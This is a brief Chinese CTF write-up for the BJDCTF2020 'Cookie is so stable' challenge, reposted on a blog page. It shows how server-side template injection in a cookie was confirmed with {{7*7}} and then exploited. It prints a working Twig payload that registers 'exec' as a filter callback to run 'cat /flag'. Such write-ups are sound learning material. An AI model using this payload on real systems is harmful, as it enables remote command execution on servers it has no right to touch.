当前位置:网站首页>[BJDCTF2020]Cookie is so stable

[BJDCTF2020]Cookie is so stable

2022-07-13 17:41:00 Bnessy

在这里插入图片描述
找了一圈,在flag.php页面发现一个输入框,抓包看下
在这里插入图片描述
提示要在cookie进行攻击,应该是个SSTI模板注入,传入{ {7*7}}
在这里插入图片描述
返回49,用的是Twig模块
payload:{ {_self.env.registerUndefinedFilterCallback("exec")}}{ {_self.env.getFilter("cat /flag")}}
在这里插入图片描述

原网站

版权声明
本文为[Bnessy]所创,转载请带上原文链接,感谢
https://bnessy.blog.csdn.net/article/details/123732434

边栏推荐

猜你喜欢

随机推荐